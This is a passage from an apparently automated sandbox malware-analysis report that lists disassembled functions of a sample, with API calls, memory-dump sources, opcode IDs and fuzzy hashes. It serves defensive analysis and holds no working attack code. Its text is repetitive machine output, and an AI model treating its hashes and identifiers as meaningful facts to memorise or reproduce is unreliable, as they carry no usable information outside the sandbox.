                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 8cea11cbc13c286d0cfd6ab92c95bfab1b0167a567a4546e5bfad28b3a7be7f1
                                                                                              • Instruction ID: 3100bf16fca40fa1edb43400bad6fb543656f23dd5d57deace39fecf02192b92
                                                                                              • Opcode Fuzzy Hash: 8cea11cbc13c286d0cfd6ab92c95bfab1b0167a567a4546e5bfad28b3a7be7f1
                                                                                              • Instruction Fuzzy Hash: BD71D2B1504B859FCB2BEB74D851AE7B7E9BF09300F04092EE2AB47181DB71B694DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003190A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003190A7
                                                                                                • Part of subcall function 003113F8: __EH_prolog.LIBCMT ref: 003113FD
                                                                                                • Part of subcall function 00312032: __EH_prolog.LIBCMT ref: 00312037
                                                                                                • Part of subcall function 0031B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0031B991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              • Opcode ID: 15d84a3a29397f40c9bc216db672b05ab3c8b95a959b942dff72c15a5415a4e7
                                                                                              • Instruction ID: 17af664f8d6273fb671942a3ebecee55a4b335eb9d5724bbd83b036bec832724
                                                                                              • Opcode Fuzzy Hash: 15d84a3a29397f40c9bc216db672b05ab3c8b95a959b942dff72c15a5415a4e7
                                                                                              • Instruction Fuzzy Hash: 904197719042586EDB2ADB60CCA5BEAB379BF18340F4404EAF54A5B082DB756FC9CF10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003113FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003113FD
                                                                                                • Part of subcall function 00316891: __EH_prolog.LIBCMT ref: 00316896
                                                                                                • Part of subcall function 0031E298: __EH_prolog.LIBCMT ref: 0031E29D
                                                                                                • Part of subcall function 0031644D: __EH_prolog.LIBCMT ref: 00316452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 4fc323764ce05d3541af58bb3a4a453900bf0398bc7e6447040015835c4c1864
                                                                                              • Instruction ID: ef7b446864e4d628e65bb8f82079a0cdf794f6f3d22c8fcfb28cce55805e77c0
                                                                                              • Opcode Fuzzy Hash: 4fc323764ce05d3541af58bb3a4a453900bf0398bc7e6447040015835c4c1864
                                                                                              • Instruction Fuzzy Hash: DA5137B19063808ECB19DF6994812D9BBF5AF59300F0802BEEC5DCF69BD7715254CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003113F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003113FD
                                                                                                • Part of subcall function 00316891: __EH_prolog.LIBCMT ref: 00316896
                                                                                                • Part of subcall function 0031E298: __EH_prolog.LIBCMT ref: 0031E29D
                                                                                                • Part of subcall function 0031644D: __EH_prolog.LIBCMT ref: 00316452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 9742582207bd054120b0fbcb0f00d5475d86441cfc5e3a692ea8d5407a713bcc
                                                                                              • Instruction ID: 6737a37156496039312f003b75ccdabf022767d85b0b5cefac6145911216badb
                                                                                              • Opcode Fuzzy Hash: 9742582207bd054120b0fbcb0f00d5475d86441cfc5e3a692ea8d5407a713bcc
                                                                                              • Instruction Fuzzy Hash: 635135B19063808ECB19DF6994812D9BBF5AF59300F0802BEEC5DCF68BDB711254CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032C217 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0032C21C
                                                                                                • Part of subcall function 003113F8: __EH_prolog.LIBCMT ref: 003113FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: a247bac70b7538574fcef40bb1754ea2d94aea3e12c838bfee4fc57e210a74ca
                                                                                              • Instruction ID: 45fbd68240397fb86d459e6c9f7f48edf316f9f413d6a5a340444dcd31d985f4
                                                                                              • Opcode Fuzzy Hash: a247bac70b7538574fcef40bb1754ea2d94aea3e12c838bfee4fc57e210a74ca
                                                                                              • Instruction Fuzzy Hash: B7216B71C04329EECF16DF94D8819EEBBB4BF09304F0004AAE805BB641DB756B45EB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033BE58 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0033BEB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: 42abfb5ad8fe07544b71222b0bf57c552cfa50386475a16014b68d0e5d005847
                                                                                              • Instruction ID: 0b517542cf08b36e4bdad4a964534c34316d3a269d7fede7b30e7f50caa23ad2
                                                                                              • Opcode Fuzzy Hash: 42abfb5ad8fe07544b71222b0bf57c552cfa50386475a16014b68d0e5d005847
                                                                                              • Instruction Fuzzy Hash: 80119133A006259FDB279E6CFC8099AB3A99B85760F174220EF55AB654DB31EC41CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031A475 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 52df85daefae9a2223169f833bd13278fc3f366d60238c4581e9736e782994a6
                                                                                              • Instruction ID: 27ce7f750d3c7cc8c9cd5e1f9386430bcffd8ace6cad5589faa967e8b9401e3b
                                                                                              • Opcode Fuzzy Hash: 52df85daefae9a2223169f833bd13278fc3f366d60238c4581e9736e782994a6
                                                                                              • Instruction Fuzzy Hash: 1511E336D019299BCB2BEF69C885AFEB375AF4C700F024129FC15AB341DB74DD808691
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032EBA2 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0032EBA7
                                                                                                • Part of subcall function 00321983: _wcslen.LIBCMT ref: 00321999
                                                                                                • Part of subcall function 00318823: __EH_prolog.LIBCMT ref: 00318828
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: b9b3ddc639cdf771a71b5f057ea1bcbf8e2468df8f1e9b0f0151a63055cc6916
                                                                                              • Instruction ID: 9193a3af531a293c93a7cd4e27411198009b7dfc82a8871bf5239b4df2c17be4
                                                                                              • Opcode Fuzzy Hash: b9b3ddc639cdf771a71b5f057ea1bcbf8e2468df8f1e9b0f0151a63055cc6916
                                                                                              • Instruction Fuzzy Hash: B711C875A182909ED717EBA8EC067DC7FF89B15310F00806AE0449B292DBF51684CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033D639 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0033C2F6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0033A543,00000001,00000364,?,00335281,00000050,?,00353070,00000200), ref: 0033C337
                                                                                              • _free.LIBCMT ref: 0033D6A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                                              • Instruction ID: b5f7d822f2c3ea1a372be26371ec8b0dec72a153e035967c5c302a776a96486e
                                                                                              • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                                              • Instruction Fuzzy Hash: B401DB722003455BE7228E69DC8295AFBD9EB95370F65061DE59897280E630A805C764
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033C2F6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0033A543,00000001,00000364,?,00335281,00000050,?,00353070,00000200), ref: 0033C337
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 6dbb296ba562b3d3d826b161bad815e725ed1766a69acee95ab6b899b3fbca2d
                                                                                              • Instruction ID: 388d4c12f0d2c8a397e688094c8de421f6dd76839ea2267f2b20bb1ab686f572
                                                                                              • Opcode Fuzzy Hash: 6dbb296ba562b3d3d826b161bad815e725ed1766a69acee95ab6b899b3fbca2d
                                                                                              • Instruction Fuzzy Hash: 09F0B439621624A6DB235A25DCC6A9A374C9F81771F16E011F849BB090DB28D90093E2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033A7FE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 8a447e1befb7da9b3170c44a5af87734ef0148c894e88f521d0880b0d3481a57
                                                                                              • Instruction ID: 23c372be06fda598784f589758f34c5c36bb8bdcd779352676a2a8812a72ccbf
                                                                                              • Opcode Fuzzy Hash: 8a447e1befb7da9b3170c44a5af87734ef0148c894e88f521d0880b0d3481a57
                                                                                              • Instruction Fuzzy Hash: 76E06535201E2156E63327659CC5B5B3E5CDB427A0F160120FC999E0D2DB54DC02C1E3
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031A880 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0031A83D,?,?,?,?,?,0034380F,000000FF), ref: 0031A89B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: e0b0fa55093326dba504f6de64bfd75f07144da4d845a1edf384dccbb19961c6
                                                                                              • Instruction ID: 31a2f82f73f0d105a31fb3765294883e21dc377eea03821d5b417da5b49ec04b
                                                                                              • Opcode Fuzzy Hash: e0b0fa55093326dba504f6de64bfd75f07144da4d845a1edf384dccbb19961c6
                                                                                              • Instruction Fuzzy Hash: 97F08270486F159FDB3A8A24C4487D2FBE8AB16326F151B5ED0E3439E4D36169CE8A41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B966 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0031BA94: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BABD
                                                                                                • Part of subcall function 0031BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BAEB
                                                                                                • Part of subcall function 0031BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BAF7
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0031B991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1464966427-0
                                                                                              • Opcode ID: fa09fceb78ebb2ccf2fbf2ed3077f22498901b3448383c557007de12e2d2da0f
                                                                                              • Instruction ID: 5bab5d1adf56eb54b80e2dcb16cfd191dcc932e35c54cfeaadf31f7d7577d83b
                                                                                              • Opcode Fuzzy Hash: fa09fceb78ebb2ccf2fbf2ed3077f22498901b3448383c557007de12e2d2da0f
                                                                                              • Instruction Fuzzy Hash: B4F08236008790AACA272BB448057CBFB945F1F335F008A49F2FD162E2C77450D59732
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00320752 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: 35fee400656dab3ddf06bb9e4c7f28f7053af286ee115eb07be65e7c501d169d
                                                                                              • Instruction ID: 842dd33483c73bc43022690aacc6d016943e7d98ee245d056bdc48d1c65f3197
                                                                                              • Opcode Fuzzy Hash: 35fee400656dab3ddf06bb9e4c7f28f7053af286ee115eb07be65e7c501d169d
                                                                                              • Instruction Fuzzy Hash: 23E086321041106ED326AB2DA845E7FABE9DFD1B20F15841EF5948B182CBB5E895DFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00322128 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 0032215D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: ed6d0ae48ab27137871d03316e6296ec064968912e77d1b5d92aaeae55535fb5
                                                                                              • Instruction ID: 5e76c962199a588104f5d07a590ed0fc7569eb0af3a069e07ede4a18b36ee837
                                                                                              • Opcode Fuzzy Hash: ed6d0ae48ab27137871d03316e6296ec064968912e77d1b5d92aaeae55535fb5
                                                                                              • Instruction Fuzzy Hash: E6D0C22061412022DA1737383C05BFF0A1A1FC6321F0B00A6B20A1B2D38F5408A2A2B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032B636 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 0032B63C
                                                                                                • Part of subcall function 0032B3C8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0032B3E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
